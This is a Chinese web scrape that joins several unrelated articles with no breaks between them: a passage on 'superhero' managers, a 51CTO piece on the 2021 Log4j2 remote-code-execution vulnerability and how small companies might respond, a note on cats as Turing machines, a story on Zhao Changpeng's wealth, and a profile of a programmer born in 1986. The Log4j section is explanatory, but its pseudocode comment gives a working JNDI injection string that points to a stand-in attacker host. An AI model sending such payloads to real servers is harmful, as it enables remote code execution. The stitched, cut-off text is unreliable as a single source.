【51CTO.com快译】我读了许多关于软件开发团队管理的书籍和文章,这些文献中的“超级英雄”通常指的是在团队中尝试帮助所有的人,解决所有的问题的工程师。他们通常不使用最好的方法,而是只关注短期的目标。当然,我观察到身边有些工程师是有这样的问题,但通常不会对团队带来重大影响,除非组织机构中存在“超级英雄”文化。
在我的职业生涯中,我通常在管理层中发现存在更多的“超级英雄”。更重要的是,他们通常会对团队和企业文化带来更多的负面影响。就我个人的观点而言,管理层的“超级英雄”有以下三个主要问题:
1.管理层的“超级英雄”通常更容易接触到商业化内容和最高决策层,因此他们的“超级英雄”行为更容易扩散到整个组织。
2.“超级英雄”是企业不良文化的开始,因为很多“超级英雄”是为了奖励而逞能。越多的“超级英雄”意味着越多的个人主义。
3.对所有的业务需求都说“好”,尝试解决所有问题,总是愿意解决所有问题的人是组织里每一个人都需要的人。他们在短期内创造了大量的价值,但是为企业的中长期发展带来了许多问题。
在刚开始的时候,我们很难区分谁是“超级英雄”,谁是高产的职员。
12月10日,看到朋友圈中已经有人在通宵修改、上线系统了。随即,又看到阿里云安全、腾讯安全部门发出的官方报告:”Apache Log4j2存在远程代码执行漏洞“,且漏洞已对外公开。
看到相关消息,马上爬起来把所有项目的日志系统过滤一遍,还好老项目采用的log4j,新项目采用的logback,没有中招。随后就看到朋友圈铺天盖地的相关消息。
作为一个史诗级的事件,紧急修改漏洞是必然的。作为程序员,如果看到这则消息,连去核查一下系统都做不到,那真的不是一个合格的程序员。
经历过这次事件,不仅是看热闹而已,还要思考一下,作为小公司如何避免、提前预防、做好准备应对这类Bug。
Apache Log4j2是一款优秀的Java日志框架,与Logback平分秋色,大量主流的开源框架采用了Log4j2,像Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。所以,这样一个底层框架出现问题,影响面可想而知。
漏洞信息:Apache Log4j 2.15.0-rc1 版本存在漏洞绕过,需及时更新至 Apache Log4j 2.15.0-rc2 版本。
影响范围:2.0 <= Apache log4j2 <= 2.14.1。
最新修复版本:https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
补救方案
方案一:升级版本,发布系统;
方案二:临时补救:
攻击原理
攻击伪代码示例:
import org.apache.log4j.Logger;
import java.io.*;
import java.sql.SQLException;
import java.util.*;
public class VulnerableLog4jExampleHandler implements HttpHandler {
static Logger log = Logger.getLogger(log4jExample.class.getName());
/**
* 示例伪代码:一个简单的HTTP端点,其中读取User Agent信息并进行日志记录;
*/
public void handle(HttpExchange he) throws IOException {
// 获取user-agent信息
String userAgent = he.getRequestHeader("user-agent");
// 此行记录日志的代码,通过记录攻击者控制的HTTP用户代理标头来触发RCE。
// 攻击者可以设置他们的User-Agent header到${jndi:ldap://attacker.com/a}
log.info("Request User Agent:" + userAgent);
String response = "Hello There, " + userAgent + "!";
he.sendResponseHeaders(200, response.length());
OutputStream os = he.getResponseBody();
os.write(response.getBytes());
os.close();
}
}
基于上述代码的基本攻击步骤:
腾讯安全专家的复现如下:
log4j2漏洞复现
关于漏洞及解决方案,上面已经详细聊了,问题基本得以解决。在大的互联网企业,是有专门的安全运维部门来监控、扫描这些漏洞的。但在小公司,很显然没有这样的条件。
那么,我们该怎么办?同时,作为事件的经历者,你是否思考过这个事件中反映出的一些其他问题吗?
第一,是否第一时间得到消息?
在大企业,一旦发现这样的漏洞,安全部门会第一时间进行通知。但在小企业,没有安全部门,你是如何获取到漏洞的消息的呢?
比如我所在的企业,是没有安全部门的,但也几乎是第一时间得知漏洞消息,进行系统排查的。
作为程序员,如果漏洞消息已经爆出很久,你却一无所知,那就应该反思一下朋友圈的质量以及对技术热点的关注度问题了。
如何获得圈内第一手消息,取决于也反映着你在社交圈或技术圈所处的位置与现状。
第二,是否置若罔闻?
很多朋友可能也看到了这则漏洞消息,但也就是看一下热闹,然后该干嘛干嘛了,系统有漏洞就有漏洞了呗~
如果你是如此,或你的团队是如此,你真的需要反省一下职业素养问题了。
很多人可能觉得自己很牛,觉得自己怀才不遇,觉得工资收入低,觉得被亏待……那么,对照一下对这件事所作出的反应,基本就知道自己是不是被亏待了。
第三,如何应对突发事件?
这样的突发事件,也是对系统运维、团队管理的一个考验,也是一个仿真练习:大家都正在进行着当前业务的开发,有一个突发Bug要修改,改一半的代码如何操作?如大面积发布?
第一,改一半的代码怎么办?如果你的团队的代码开发都是基于master(主干)进行开发、提交代码,针对这样的突发事件,必然会面对改了一半的代码,提交了,想一起发布但还没测试,这种骑虎难下的局面。
所以,代码的管理(如何打分支、合并分支、分支与主干代码不同环境的发布)必须得从日常的点滴做起,当突发事件发生时,也不至于手忙脚乱。
第二,有大量项目需要发布怎么办?当然,最古老的方式就是一个系统一个系统手动发布。如果是微服务及应用较多,不仅容易出现错误,而且耗时较长。这就提醒我们,构建自动化发布流程的重要性。
第四,怎么找出系统漏洞?
有安全部门的公司,会定期扫描系统漏洞,那么没有安全部门的公司只能坐以待毙吗?
其实,还是有一些方法可以发现系统的一些漏洞的。比如,勤关注使用框架的版本升级、利用三方提供的漏洞扫描(比如阿里云服务器的安全扫描)、与同行交流等手段。
任何一个漏洞对软件系统来说都有可能是致命的,也需要我们谨慎对待的。对于漏洞的处理及做出的反应也是从业者职业素养的体现。
而如果能从一次次突发事件中学习、思考到更多内容,你将比别人更快的成长。
来源:https://netsecurity.51cto.com/art/202112/694738.htm
近日,一位法国开发者Chloé Lourseyre在她的个人博客上提出了「猫猫计算机」的概念。由此,她提出了一个天马行空的想法:猫是不是「图灵完备」的?它是「图灵机」吗?
软萌可爱的猫咪,总会唤起我们想要「撸猫」或者「吸猫」的冲动。
和猫咪待在一块,还真有种治愈的感觉。
而且,按照一位法国开发者Chloé Lourseyre的说法,猫咪甚至可以当计算机用!
近日,在她的个人博客上讨论了一个很重要的话题:猫是不是「图灵完备」的?它是「图灵机」吗?
测试对象就是这只小猫Peluche
Peluche是一只毛茸茸的小猫,就住在Chloé Lourseyre家里。它就是今天的测试对象。
刚刚,华人首富再度易主!农夫山泉董事长钟睒睒在这个宝座甚至只待了一年左右。
夺下第一的神秘男人,叫赵长鹏。
99.9%的人可能都不认识他,但在币圈里,他是王一般的存在。
他创立的币安平台,世界最大的加密货币交易所,每天760亿美元的高频交易,把赵长鹏的身价推高到至少900亿美元,5700多亿人民币,甚至挤入了全球十大富豪之列。
从房地产到互联网,再到实体产业,一批又一批的华人首富见证了时代的急剧变迁。
赵长鹏也不例外。疫情之后的全球大放水让加密货币连续两年成为涨幅最高的资产,币安币的价格从2020年的40美元直接升到了如今的600多美元,翻了至少15倍。
当普通人连区块链、元宇宙的概念还没搞明白时,有人已经把财富的马达开成了飞机的引擎……
时代抛弃你时,真的是连一声再见也不会说。
得知炒币大佬成了首富之后,我远在上海、北京、昆明的朋友纷纷问我,要不要把股市里的钱拿出来加入这场资本狂欢的盛宴,甚至无脑买币安币……然后分享下时代的红利,实现45岁前退休。
作为资深财经从业者,我觉得这问题不能一概而论,要辩证看待,视手头钱的具体情况而定,具体问题具体分析!
比如说钱是自己赚的,就不要进去了。
一个生于 1986 年的人,他所走过的前半生:
从出生起,他就经常踩到最剧烈的技术与社会变迁的节点。2400 万中国人和他同岁,他赶上了这里的最后一次婴儿潮,去年的出生人口只有这一半。250 万户中国家庭装着电话,这个数字当时可是保密信息。
等他 10 岁,中国大部分城市刚接入互联网。不过 “互联网” 对于大部分中国人来说,还比较新奇。一位年轻的前英语教师帮人做网站的生意不太顺利,低价把自己创办一年的 “中国黄页” 卖给了当地的电信公司。
他初中接触计算机,可能因为《星际争霸》;够聪明的话,还能拿到全市范围内的编程奖;高中激励他考上大学的,是父亲答应给他买台电脑。
高考那年——2004,他得考进同龄人中的前 9%,才能读上本科。最后,只有不到 10 万人挤进刚开始变得热门的计算机相关专业。读计算机也是满足爱好,他会觉得,自己在编程方面或许有点天分。
大学时代,短短四年,天翻地覆。刚入学时,假如他用淘宝网购,得去邮局汇款到支付宝账户,再等邮政快递员送货上门。但到了大四,他已经能用上社交网络,在开心网、校内网和同学们相互关注。
毕业时——2008,中国互联网用户数量超过了美国,这只是 “流量红利时代” 的开始。两年后,移动时代随着 iPhone 4 和联通 3G 进入中国,手机上实用的软件还不多。王兴新办的美团网更适合电脑上用,张小龙正在网上看工程师写的技术博客,伺机招人补充团队,开发微信 1.0。
他不是王兴的创业伙伴,也没有被张小龙刷中,但这都不算紧要事。他还可以选择加入一家新崛起的中国互联网公司。他大概率会发现,很多同学最后也做了相似的选择,去的公司很新兴。毕竟,前一年,最被软件工程师追逐的公司还是谷歌中国。去一家国企安稳待一辈子的想法早被他抛在脑后。
之后几年里,假若他能持续精进技术,他将会从工程师升到 team leader,管理一个数十人的小团队,成为一个典型的中国互联网公司技术中坚。到 2014 年,中国互联网行业已经诞生了两个价值数千亿美元的超级巨头,甩开了控制各种资源的国资巨无霸们。
那是一段他们与这个职业的 “超长蜜月期”,智商高、回报高、社会地位高,到了相亲市场都是炙手之选。
直到 2017 年。
一篇 “开始集中清理 34 岁以上员工” 的华为内网帖引发全网大讨论。年龄突然成了一个经久不衰的话题,能在每一年都引发几场大规模的媒体讨论。
最开始几年,他可能一度怀疑,这是不是社交媒体在制造焦虑。直到后来,他越来越把这当回事,认真地想,自己在公司还能不能迈过 “35” 这道坎。
以上经历,是过去 1 个多月,我们采访了十多位在一二线互联网公司软件开发人员的经历集合。